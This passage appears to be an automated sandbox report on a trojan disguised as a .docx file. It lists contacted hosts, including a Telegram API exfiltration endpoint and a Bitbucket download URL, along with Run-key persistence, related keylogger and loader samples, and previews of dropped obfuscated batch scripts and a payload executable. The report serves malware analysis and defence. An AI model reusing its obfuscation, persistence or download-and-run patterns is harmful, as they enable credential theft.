                                                                                https://bbuseruploads.s3.amazonaws.com:443/e427e629-62a6-4ecd-bf22-56e4d6ea083f/downloads/3fdf6255-cD.G Governor Istek,Docx.exe, 00000000.00000002.2236856476.00000000007DC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  http://www.pmail.com0D.G Governor Istek,Docx.exe, 00000000.00000002.2278122938.0000000021A1C000.00000004.00001000.00020000.00000000.sdmp, D.G Governor Istek,Docx.exe, 00000000.00000002.2277099019.0000000021778000.00000004.00001000.00020000.00000000.sdmp, D.G Governor Istek,Docx.exe, 00000000.00000003.2226424806.000000007F0C0000.00000004.00001000.00020000.00000000.sdmp, D.G Governor Istek,Docx.exe, 00000000.00000003.2232552355.000000007F11A000.00000004.00001000.00020000.00000000.sdmp, D.G Governor Istek,Docx.exe, 00000000.00000002.2279806088.000000007F450000.00000004.00001000.00020000.00000000.sdmp, D.G Governor Istek,Docx.exe, 00000000.00000002.2278647892.0000000021AF0000.00000004.00000020.00020000.00000000.sdmp, xzeheenC.pif.0.drfalse
                                                                                  • Avira URL Cloud: safe
                                                                                  		unknown

                                                                                  World Map of Contacted IPs

                                                                                  • No. of IPs < 25%
                                                                                  • 25% < No. of IPs < 50%
                                                                                  • 50% < No. of IPs < 75%
                                                                                  • 75% < No. of IPs

                                                                                  Public IPs

                                                                                  IPDomainCountryFlagASNASN NameMalicious
                                                                                  149.154.167.220
                                                                                  		api.telegram.orgUnited Kingdom
                                                                                  		62041TELEGRAMRUfalse
                                                                                  52.217.32.148
                                                                                  		s3-w.us-east-1.amazonaws.comUnited States
                                                                                  		16509AMAZON-02USfalse
                                                                                  185.166.143.49
                                                                                  		bitbucket.orgGermany
                                                                                  		16509AMAZON-02USfalse
                                                                                  132.226.247.73
                                                                                  		checkip.dyndns.comUnited States
                                                                                  		16989UTMEMUSfalse

                                                                                  General Information

                                                                                  Joe Sandbox version:41.0.0 Charoite
                                                                                  Analysis ID:1577649
                                                                                  Start date and time:2024-12-18 16:15:35 +01:00
                                                                                  Joe Sandbox product:CloudBasic
                                                                                  Overall analysis duration:0h 10m 31s
                                                                                  Hypervisor based Inspection enabled:false
                                                                                  Report type:full
                                                                                  Cookbook file name:default.jbs
                                                                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                  Number of analysed new started processes analysed:15
                                                                                  Number of new started drivers analysed:0
                                                                                  Number of existing processes analysed:0
                                                                                  Number of existing drivers analysed:0
                                                                                  Number of injected processes analysed:0
                                                                                  Technologies:
                                                                                  • HCA enabled
                                                                                  • EGA enabled
                                                                                  • AMSI enabled
                                                                                  Analysis Mode:default
                                                                                  Analysis stop reason:Timeout
                                                                                  Sample name:D.G Governor Istek,Docx.exe
                                                                                  Detection:MAL
                                                                                  Classification:mal100.troj.spyw.evad.winEXE@21/7@4/4
                                                                                  EGA Information:
                                                                                  • Successful, ratio: 100%
                                                                                  HCA Information:
                                                                                  • Successful, ratio: 96%
                                                                                  • Number of executed functions: 210
                                                                                  • Number of non-executed functions: 57
                                                                                  Cookbook Comments:
                                                                                  • Found application associated with file extension: .exe

                                                                                  Warnings

                                                                                  • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                                                                  • Excluded IPs from analysis (whitelisted): 13.107.246.63, 20.190.147.2, 20.190.177.82, 20.12.23.50
                                                                                  • Excluded domains from analysis (whitelisted): client.wns.windows.com, otelrules.azureedge.net, login.live.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                  • Not all processes where analyzed, report is missing behavior information
                                                                                  • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                  • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                  • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                  • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                  • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                  • VT rate limit hit for: D.G Governor Istek,Docx.exe

                                                                                  Simulations

                                                                                  Behavior and APIs

                                                                                  TimeTypeDescription
                                                                                  10:16:38API Interceptor2x Sleep call for process: D.G Governor Istek,Docx.exe modified
                                                                                  10:16:55API Interceptor4x Sleep call for process: Cneehezx.PIF modified
                                                                                  10:17:02API Interceptor689196x Sleep call for process: xzeheenC.pif modified
                                                                                  16:16:46AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Cneehezx C:\Users\Public\Cneehezx.url
                                                                                  16:16:54AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Cneehezx C:\Users\Public\Cneehezx.url

                                                                                  Joe Sandbox View / Context

                                                                                  IPs

                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                  149.154.167.220Nuevo pedido de cotizaci#U00f3n 663837 4899272.pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                    PAYMENT SWIFT AND SOA TT07180016-24_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                      chrome11.exeGet hashmaliciousUnknownBrowse
                                                                                        chrome11.exeGet hashmaliciousUnknownBrowse
                                                                                          urS3jQ9qb5.jarGet hashmaliciousCan StealerBrowse
                                                                                            urS3jQ9qb5.jarGet hashmaliciousCan StealerBrowse
                                                                                              RFQ December-January Forcast and TCL.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                FileScanner.exeGet hashmaliciousUnknownBrowse
                                                                                                  PK241200518-EMAIL RELEASE-pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                    stealer.jarGet hashmaliciousCan StealerBrowse
                                                                                                      185.166.143.49http://jasonj002.bitbucket.io/Get hashmaliciousHTMLPhisherBrowse
                                                                                                      • jasonj002.bitbucket.io/
                                                                                                      132.226.247.730001.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                      • checkip.dyndns.org/
                                                                                                      Nuevo pedido de cotizaci#U00f3n 663837 4899272.pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                      • checkip.dyndns.org/
                                                                                                      ugpJX5h56S.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                      • checkip.dyndns.org/
                                                                                                      hesaphareketi-01.pdf.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                      • checkip.dyndns.org/
                                                                                                      Shipment 990847575203.pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                      • checkip.dyndns.org/
                                                                                                      DEC 2024 RFQ.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                      • checkip.dyndns.org/
                                                                                                      Request for quote.docGet hashmaliciousSnake KeyloggerBrowse
                                                                                                      • checkip.dyndns.org/
                                                                                                      Hesap_Hareketleri_10122024_html.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                      • checkip.dyndns.org/
                                                                                                      Hesap_Hareketleri_09122024_html.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                      • checkip.dyndns.org/
                                                                                                      E-dekont.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                      • checkip.dyndns.org/

                                                                                                      Domains

                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                      s3-w.us-east-1.amazonaws.comhttp://www.kukaj-to.chat/sedoGet hashmaliciousUnknownBrowse
                                                                                                      • 3.5.27.174
                                                                                                      fGZLZhXIt1.batGet hashmaliciousUnknownBrowse
                                                                                                      • 3.5.31.118
                                                                                                      V7giEUv6Ee.batGet hashmaliciousUnknownBrowse
                                                                                                      • 3.5.28.132
                                                                                                      BwQ1ZjHbt3.batGet hashmaliciousUnknownBrowse
                                                                                                      • 3.5.0.126
                                                                                                      GdGXG0bnxH.exeGet hashmaliciousUnknownBrowse
                                                                                                      • 16.182.39.201
                                                                                                      https://eu.onamoc.comano.us/XaFJNdmNsY0JUVzZrd09aZnpEZk9LNXJHSFV1RTlrbFdPMXQ5dzRKTHV4dEdpUEhTM1I1MCszdjdWWm54V01kSEhOSlpOSFpjMUlsaFNTc0l3eXhVeWl3TGVjWm14bGMxUFkzWWFkVUQvbUlNMGEza0pnOFFCK3N4TDBlc3RyYWJkSE9xVU9ETG5TU1lHQkZwdStVdXhGMzdoQzltdFAwRnc0WTJuMmF3Q1VkTzdMb0lwNXhqOFQ3eGRtK0ZuQUpydjMxSWdnPT0tLUFPWFdqaFhtRnVKaEhNK20tLUlJNFZwQjNETFQyTk1iL0UxMUxBTGc9PQ==?cid=300477933Get hashmaliciousKnowBe4Browse
                                                                                                      • 52.216.54.49
                                                                                                      https://login.corp-internal.org/17058d3d8656ed69?l=27Get hashmaliciousUnknownBrowse
                                                                                                      • 52.216.58.145
                                                                                                      18037.docGet hashmaliciousUnknownBrowse
                                                                                                      • 52.216.144.19
                                                                                                      4JwhvqLe8n.exeGet hashmaliciousRemcosBrowse
                                                                                                      • 3.5.24.44
                                                                                                      fIPSLgT0lO.exeGet hashmaliciousRemcosBrowse
                                                                                                      • 52.217.129.233
                                                                                                      checkip.dyndns.com0001.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                      • 132.226.8.169
                                                                                                      Nuevo pedido de cotizaci#U00f3n 663837 4899272.pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                      • 132.226.247.73
                                                                                                      PAYMENT SWIFT AND SOA TT07180016-24_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                      • 193.122.6.168
                                                                                                      RFQ December-January Forcast and TCL.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                      • 158.101.44.242
                                                                                                      Invoice.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                      • 193.122.6.168
                                                                                                      PK241200518-EMAIL RELEASE-pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                      • 132.226.8.169
                                                                                                      ugpJX5h56S.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                      • 132.226.247.73
                                                                                                      87h216Snb7.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                      • 193.122.130.0
                                                                                                      dP5z8RpEyQ.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                      • 193.122.130.0
                                                                                                      TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                      • 158.101.44.242
                                                                                                      bitbucket.orgcredit.jsGet hashmaliciousPureLog Stealer, RHADAMANTHYSBrowse
                                                                                                      • 185.166.143.48
                                                                                                      fGZLZhXIt1.batGet hashmaliciousUnknownBrowse
                                                                                                      • 185.166.143.48
                                                                                                      V7giEUv6Ee.batGet hashmaliciousUnknownBrowse
                                                                                                      • 185.166.143.50
                                                                                                      BwQ1ZjHbt3.batGet hashmaliciousUnknownBrowse
                                                                                                      • 185.166.143.48
                                                                                                      GdGXG0bnxH.exeGet hashmaliciousUnknownBrowse
                                                                                                      • 185.166.143.50
                                                                                                      4JwhvqLe8n.exeGet hashmaliciousRemcosBrowse
                                                                                                      • 185.166.143.49
                                                                                                      fIPSLgT0lO.exeGet hashmaliciousRemcosBrowse
                                                                                                      • 185.166.143.50
                                                                                                      hoTwj68T1D.exeGet hashmaliciousUnknownBrowse
                                                                                                      • 185.166.143.49
                                                                                                      4JwhvqLe8n.exeGet hashmaliciousUnknownBrowse
                                                                                                      • 185.166.143.49
                                                                                                      fIPSLgT0lO.exeGet hashmaliciousUnknownBrowse
                                                                                                      • 185.166.143.49
                                                                                                      api.telegram.orgNuevo pedido de cotizaci#U00f3n 663837 4899272.pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                      • 149.154.167.220
                                                                                                      PAYMENT SWIFT AND SOA TT07180016-24_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                      • 149.154.167.220
                                                                                                      chrome11.exeGet hashmaliciousUnknownBrowse
                                                                                                      • 149.154.167.220
                                                                                                      chrome11.exeGet hashmaliciousUnknownBrowse
                                                                                                      • 149.154.167.220
                                                                                                      random.exe.6.exeGet hashmaliciousLummaC, Python Stealer, Amadey, LummaC Stealer, Monster Stealer, Stealc, VidarBrowse
                                                                                                      • 149.154.167.220
                                                                                                      urS3jQ9qb5.jarGet hashmaliciousCan StealerBrowse
                                                                                                      • 149.154.167.220
                                                                                                      urS3jQ9qb5.jarGet hashmaliciousCan StealerBrowse
                                                                                                      • 149.154.167.220
                                                                                                      RFQ December-January Forcast and TCL.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                      • 149.154.167.220
                                                                                                      FileScanner.exeGet hashmaliciousUnknownBrowse
                                                                                                      • 149.154.167.220
                                                                                                      PK241200518-EMAIL RELEASE-pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                      • 149.154.167.220

                                                                                                      ASNs

                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                      TELEGRAMRUNuevo pedido de cotizaci#U00f3n 663837 4899272.pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                      • 149.154.167.220
                                                                                                      PAYMENT SWIFT AND SOA TT07180016-24_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                      • 149.154.167.220
                                                                                                      chrome11.exeGet hashmaliciousUnknownBrowse
                                                                                                      • 149.154.167.220
                                                                                                      chrome11.exeGet hashmaliciousUnknownBrowse
                                                                                                      • 149.154.167.220
                                                                                                      noll.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                      • 149.154.167.99
                                                                                                      urS3jQ9qb5.jarGet hashmaliciousCan StealerBrowse
                                                                                                      • 149.154.167.220
                                                                                                      urS3jQ9qb5.jarGet hashmaliciousCan StealerBrowse
                                                                                                      • 149.154.167.220
                                                                                                      RFQ December-January Forcast and TCL.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                      • 149.154.167.220
                                                                                                      FileScanner.exeGet hashmaliciousUnknownBrowse
                                                                                                      • 149.154.167.220
                                                                                                      PK241200518-EMAIL RELEASE-pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                      • 149.154.167.220
                                                                                                      AMAZON-02USarmv5l.elfGet hashmaliciousMiraiBrowse
                                                                                                      • 34.243.160.129
                                                                                                      la.bot.arm.elfGet hashmaliciousMiraiBrowse
                                                                                                      • 34.254.182.186
                                                                                                      https://launch.app/plainsartGet hashmaliciousHTMLPhisherBrowse
                                                                                                      • 76.76.21.21
                                                                                                      https://heyzine.com/flip-book/f976862c0c.htmlGet hashmaliciousUnknownBrowse
                                                                                                      • 35.157.30.249
                                                                                                      https://pluginvest.freshdesk.com/en/support/solutions/articles/157000010678-pluginvest-laadoplossingGet hashmaliciousUnknownBrowse
                                                                                                      • 108.158.75.74
                                                                                                      http://recp.mkt81.net/ctt?m=9201264&r=MjcwMzc5ODk4MTM3S0&b=0&j=MTY4MDU5NzgyOAS2&k=Language&kx=1&kt=12&kd=//docs.google.com/drawings/d/1GBvP8EGp9_63LeC_UMSYm_dkcuk4Q6yrMmrOzMDg_wk/preview?pli=1Get hashmaliciousUnknownBrowse
                                                                                                      • 99.79.158.237
                                                                                                      Nuevo pedido de cotizaci#U00f3n 663837 4899272.pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                      • 3.130.71.34
                                                                                                      VJQyKuHEUe.exeGet hashmaliciousUnknownBrowse
                                                                                                      • 3.5.237.31
                                                                                                      loligang.arm.elfGet hashmaliciousMiraiBrowse
                                                                                                      • 184.79.152.88
                                                                                                      sxVHUOSqVC.exeGet hashmaliciousUnknownBrowse
                                                                                                      • 52.95.160.49
                                                                                                      AMAZON-02USarmv5l.elfGet hashmaliciousMiraiBrowse
                                                                                                      • 34.243.160.129
                                                                                                      la.bot.arm.elfGet hashmaliciousMiraiBrowse
                                                                                                      • 34.254.182.186
                                                                                                      https://launch.app/plainsartGet hashmaliciousHTMLPhisherBrowse
                                                                                                      • 76.76.21.21
                                                                                                      https://heyzine.com/flip-book/f976862c0c.htmlGet hashmaliciousUnknownBrowse
                                                                                                      • 35.157.30.249
                                                                                                      https://pluginvest.freshdesk.com/en/support/solutions/articles/157000010678-pluginvest-laadoplossingGet hashmaliciousUnknownBrowse
                                                                                                      • 108.158.75.74
                                                                                                      http://recp.mkt81.net/ctt?m=9201264&r=MjcwMzc5ODk4MTM3S0&b=0&j=MTY4MDU5NzgyOAS2&k=Language&kx=1&kt=12&kd=//docs.google.com/drawings/d/1GBvP8EGp9_63LeC_UMSYm_dkcuk4Q6yrMmrOzMDg_wk/preview?pli=1Get hashmaliciousUnknownBrowse
                                                                                                      • 99.79.158.237
                                                                                                      Nuevo pedido de cotizaci#U00f3n 663837 4899272.pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                      • 3.130.71.34
                                                                                                      VJQyKuHEUe.exeGet hashmaliciousUnknownBrowse
                                                                                                      • 3.5.237.31
                                                                                                      loligang.arm.elfGet hashmaliciousMiraiBrowse
                                                                                                      • 184.79.152.88
                                                                                                      sxVHUOSqVC.exeGet hashmaliciousUnknownBrowse
                                                                                                      • 52.95.160.49

                                                                                                      JA3 Fingerprints

                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                      3b5074b1b5d032e5620f69f9f700ff0ehttps://launch.app/plainsartGet hashmaliciousHTMLPhisherBrowse
                                                                                                      • 149.154.167.220
                                                                                                      https://pluginvest.freshdesk.com/en/support/solutions/articles/157000010678-pluginvest-laadoplossingGet hashmaliciousUnknownBrowse
                                                                                                      • 149.154.167.220
                                                                                                      yoyf.exeGet hashmaliciousUnknownBrowse
                                                                                                      • 149.154.167.220
                                                                                                      yoyf.exeGet hashmaliciousUnknownBrowse
                                                                                                      • 149.154.167.220
                                                                                                      hnsjdghf18.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                      • 149.154.167.220
                                                                                                      kjshdgacg18.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                      • 149.154.167.220
                                                                                                      Nuevo pedido de cotizaci#U00f3n 663837 4899272.pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                      • 149.154.167.220
                                                                                                      PAYMENT SWIFT AND SOA TT07180016-24_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                      • 149.154.167.220
                                                                                                      cali.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                      • 149.154.167.220
                                                                                                      VJQyKuHEUe.exeGet hashmaliciousUnknownBrowse
                                                                                                      • 149.154.167.220
                                                                                                      a0e9f5d64349fb13191bc781f81f42e1file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, PureLog Stealer, StealcBrowse
                                                                                                      • 52.217.32.148
                                                                                                      • 185.166.143.49
                                                                                                      0Vwp4nJQOc.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                                      • 52.217.32.148
                                                                                                      • 185.166.143.49
                                                                                                      Lw1k8a7gQu.exeGet hashmaliciousLummaCBrowse
                                                                                                      • 52.217.32.148
                                                                                                      • 185.166.143.49
                                                                                                      iOnDpwrkWY.exeGet hashmaliciousLummaCBrowse
                                                                                                      • 52.217.32.148
                                                                                                      • 185.166.143.49
                                                                                                      Z1jUFmrTua.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                                      • 52.217.32.148
                                                                                                      • 185.166.143.49
                                                                                                      greatindiancompaniesgivenbestgiftforyourhealthgivengoodreturns.htaGet hashmaliciousCobalt Strike, Remcos, DBatLoaderBrowse
                                                                                                      • 52.217.32.148
                                                                                                      • 185.166.143.49
                                                                                                      qth5kdee.exeGet hashmaliciousLummaCBrowse
                                                                                                      • 52.217.32.148
                                                                                                      • 185.166.143.49
                                                                                                      LgendPremium.exeGet hashmaliciousLummaCBrowse
                                                                                                      • 52.217.32.148
                                                                                                      • 185.166.143.49
                                                                                                      random.exe.7.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, PureLog Stealer, RHADAMANTHYS, Stealc, VidarBrowse
                                                                                                      • 52.217.32.148
                                                                                                      • 185.166.143.49
                                                                                                      ji2xlo1f.exeGet hashmaliciousLummaCBrowse
                                                                                                      • 52.217.32.148
                                                                                                      • 185.166.143.49

                                                                                                      Dropped Files

                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                      C:\Users\Public\Libraries\xzeheenC.pifqDKTsL1y44.exeGet hashmaliciousDBatLoaderBrowse
                                                                                                        PRODUCT.batGet hashmaliciousAveMaria, DBatLoader, UACMeBrowse
                                                                                                          purchaseorder.batGet hashmaliciousAveMaria, DBatLoader, UACMeBrowse
                                                                                                            PO11550.exeGet hashmaliciousAveMaria, DBatLoader, UACMeBrowse
                                                                                                              SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exeGet hashmaliciousAgentTesla, DBatLoader, RedLineBrowse
                                                                                                                PCMNil7wkU.exeGet hashmaliciousAgentTesla, AsyncRAT, DBatLoader, RedLineBrowse
                                                                                                                  tTIYCp2sf4.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                                                                    Re_Porforma_Invoice_60_downpayment_-_PT_Era_F1909003_Project_Kupang.exeGet hashmaliciousAveMaria, DBatLoader, UACMeBrowse

                                                                                                                      Created / dropped Files

                                                                                                                      C:\Users\Public\Cneehezx.url

                                                                                                                      Download File
                                                                                                                      Process:C:\Users\user\Desktop\D.G Governor Istek,Docx.exe
                                                                                                                      File Type:MS Windows 95 Internet shortcut text (URL=<file:"C:\\Users\\Public\\Libraries\\Cneehezx.PIF">), ASCII text, with CRLF line terminators
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):104
                                                                                                                      Entropy (8bit):5.074788252940729
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:3:HRAbABGQYmTWAX+rSF55i0XM1d1sbxrcUy4RPNn:HRYFVmTWDyzwExrl19Nn
                                                                                                                      MD5:1D42AE8B7F4540F199B4FA6E57A944A0
                                                                                                                      SHA1:31415E02DA4BE9626ECB68D924CD7FC3D7D8959A
                                                                                                                      SHA-256:62CFD805845DC5EE146D3A3D90317293DB3DCF38F36410754AF22C58972DA5DB
                                                                                                                      SHA-512:F789375754F01684AA1AC8608A8F3D4E066CE1CE657E76FFA214780CFB62791966C1B6392C071131D5CA947EEBAB88159EE8EBC5E91E55CB592DC8F29C4E4EED
                                                                                                                      Malicious:true
                                                                                                                      Preview:[InternetShortcut]..URL=file:"C:\\Users\\Public\\Libraries\\Cneehezx.PIF"..IconIndex=960091..HotKey=38..

                                                                                                                      C:\Users\Public\CneehezxF.cmd

                                                                                                                      Download File
                                                                                                                      Process:C:\Users\user\Desktop\D.G Governor Istek,Docx.exe
                                                                                                                      File Type:DOS batch file, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):15789
                                                                                                                      Entropy (8bit):4.658965888116939
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:384:wleG1594aKczJRP1dADCDswtJPZ9KZVst1U:LA4aLz08JaJ
                                                                                                                      MD5:CCE3C4AEE8C122DD8C44E64BD7884D83
                                                                                                                      SHA1:C555C812A9145E2CBC66C7C64BA754B0C7528D6D
                                                                                                                      SHA-256:4A12ABB62DD0E5E1391FD51B7448EF4B9DA3B3DC83FF02FB111E15D6A093B5E8
                                                                                                                      SHA-512:EA23EDFB8E3CDA49B78623F6CD8D0294A4F4B9B11570E8478864EBDEE39FCC6B8175B52EB947ED904BE27B5AF2535B9CA08595814557AE569020861A133D827D
                                                                                                                      Malicious:false
                                                                                                                      Preview:.@echo off..@% %e%.%c%o..%h%. .......%o%r.r.r.....% %.......%o%..%f% .%f%o%..s%...... .%e%.r.%t%...o..r.% %.....%"%.......%u%.%T%r..%A%..%j%r........%=%.. o......%s%....o...%e%.....%t%.% %........%"%.r.......o%..%uTAj%"%.. . ..%N%.r r.... %U%... .oo...%M%r.........%j%.....%=%.....o....%=%.%"%r...... %..%uTAj%"% .....%m%..oo%X%.o.. %m%.....or.%w%....%O%.%g%.....%B%.o .r.. %W%..%D%........%t%o.r...%%NUMj%h% ...o.%t%..%t%o......o%p%.........%"% .r%..%uTAj%"% .... ..%G%...o.. ..%n%..rr..%j%..o......%D%...o .r..%R%r.

                                                                                                                      C:\Users\Public\Libraries\Cneehezx

                                                                                                                      Download File
                                                                                                                      Process:C:\Users\user\Desktop\D.G Governor Istek,Docx.exe
                                                                                                                      File Type:data
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):583193
                                                                                                                      Entropy (8bit):7.3073922634117
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:12288:iF0qv+93X92OirXQ2mHlHCrVs1NY/Ac95S5XCswppBYdH:i+qG9IOiM2iU/50CtQ
                                                                                                                      MD5:4F30E1377F4BDE432BFCDF9E0545EEC6
                                                                                                                      SHA1:048E58EBD70C38E15AD1BEE80C3B50FB149EAC02
                                                                                                                      SHA-256:7FFEBB424079AA78D67B79ABCE9CDF79F3E0590F2452823400FFE2BB45BAA23A
                                                                                                                      SHA-512:07074EAA924050F6D34102D16DBECAA6B4E279FD452BA0732CABDD308CAF732C7757D0E2245ABE2A8DDFA81E3F261B05BA4F7C6FD27E47E2D84CC3904C0BE97E
                                                                                                                      Malicious:true
                                                                                                                      Preview:...:...,................................................................................................:...,/.............:...,..............................................................................................................................................................................................................................................................................................~..........................................~...............................................................#~... ..+...... .....".....................!.............................*........................}................~........}&.................'#...&...&... ................... "...)......!.'............ ...&....*....... ......#...............................*....*..................~.........................*.#........................}..... ).....!..)%...................$...~.........%}.. ...

                                                                                                                      C:\Users\Public\Libraries\Cneehezx.PIF

                                                                                                                      Download File
                                                                                                                      Process:C:\Users\user\Desktop\D.G Governor Istek,Docx.exe
                                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):1019392
                                                                                                                      Entropy (8bit):7.007121444882125
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:24576:Mt8U4ln77mcFj7LF6iNQj0KyEB1zcwfPMed:0wnRQj0KyEB1zcwfPME
                                                                                                                      MD5:7D212D2DAB091BEC36A906828D270C65
                                                                                                                      SHA1:4D251936D754C47EE58E3913A99E2659E731AC98
                                                                                                                      SHA-256:4390AD0A5BD9184058CC6E2FBE64F896F71B0F0E95C27D8769837C6F979B11DB
                                                                                                                      SHA-512:AC59413964D9C9A55BCA14AFA22834B50D4CB113107D647B50B94CE49B82D887A61D31E99DAA0450EF35F2DF44B7CC524738CDF36007B0E357EB3554CFBFFE40
                                                                                                                      Malicious:true
                                                                                                                      Antivirus:
                                                                                                                      • Antivirus: Avira, Detection: 100%
                                                                                                                      • Antivirus: ReversingLabs, Detection: 53%
                                                                                                                      Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................$...f.......8.......@....@.......................... ...................@...........................P...&...............................n...................................................W...............................text............................... ..`.itext..L....0...................... ..`.data........@.......(..............@....bss.....6...............................idata...&...P...(..................@....tls....4................................rdata..............................@..@.reloc...n.......p..................@..B.rsrc...............................@..@............. ......................@..@................................................................................................

                                                                                                                      C:\Users\Public\Libraries\FX.cmd

                                                                                                                      Download File
                                                                                                                      Process:C:\Users\user\Desktop\D.G Governor Istek,Docx.exe
                                                                                                                      File Type:DOS batch file, Unicode text, UTF-8 text, with CRLF line terminators
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):8556
                                                                                                                      Entropy (8bit):4.623706637784657
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:192:dSSQx41VVrTlS2owuuWTtkY16Wdhdsu0mYKDCIfYaYuX1fcDuy:Vrhgwuua5vdnQaCIVJF6uy
                                                                                                                      MD5:60CD0BE570DECD49E4798554639A05AE
                                                                                                                      SHA1:BD7BED69D9AB9A20B5263D74921C453F38477BCB
                                                                                                                      SHA-256:CA6A6C849496453990BECEEF8C192D90908C0C615FA0A1D01BCD464BAD6966A5
                                                                                                                      SHA-512:AB3DBDB4ED95A0CB4072B23DD241149F48ECFF8A69F16D81648E825D9D81A55954E5DD9BC46D3D7408421DF30C901B9AD1385D1E70793FA8D715C86C9E800C57
                                                                                                                      Malicious:true
                                                                                                                      Preview:@echo off..set "MJtc=Iet "..@%.r.......%e%...%c%...r....%h%.....%o%........% % .....%o%...%f%.o.%f%......%..s%.......%e%.%t%.. .....% %.rr.. .%"%...%w%......%o%...o..%t%r.....%c%....%=%... . .%s%...... %e%....%t%....% %........ %"% o...%..%wotc%"%.%n% r .%O%...%P%.. ..%t%.%=%...... o..%=%......%"%....r...%..%wotc%"aeeYdDdanR%nOPt%s://"..%wotc%"%..........%a%.%e%......%e%.r..%Y%..%d%.....r....%D%.. %d% ... .%a%.. ...%n%.. ..%R%........%%nOPt%s%...... .%:%.. %/%....%/%r......%"%.....r.%..%wotc%"%...... ...%U%.o..%g%.r.%

                                                                                                                      C:\Users\Public\Libraries\NEO.cmd

                                                                                                                      Download File
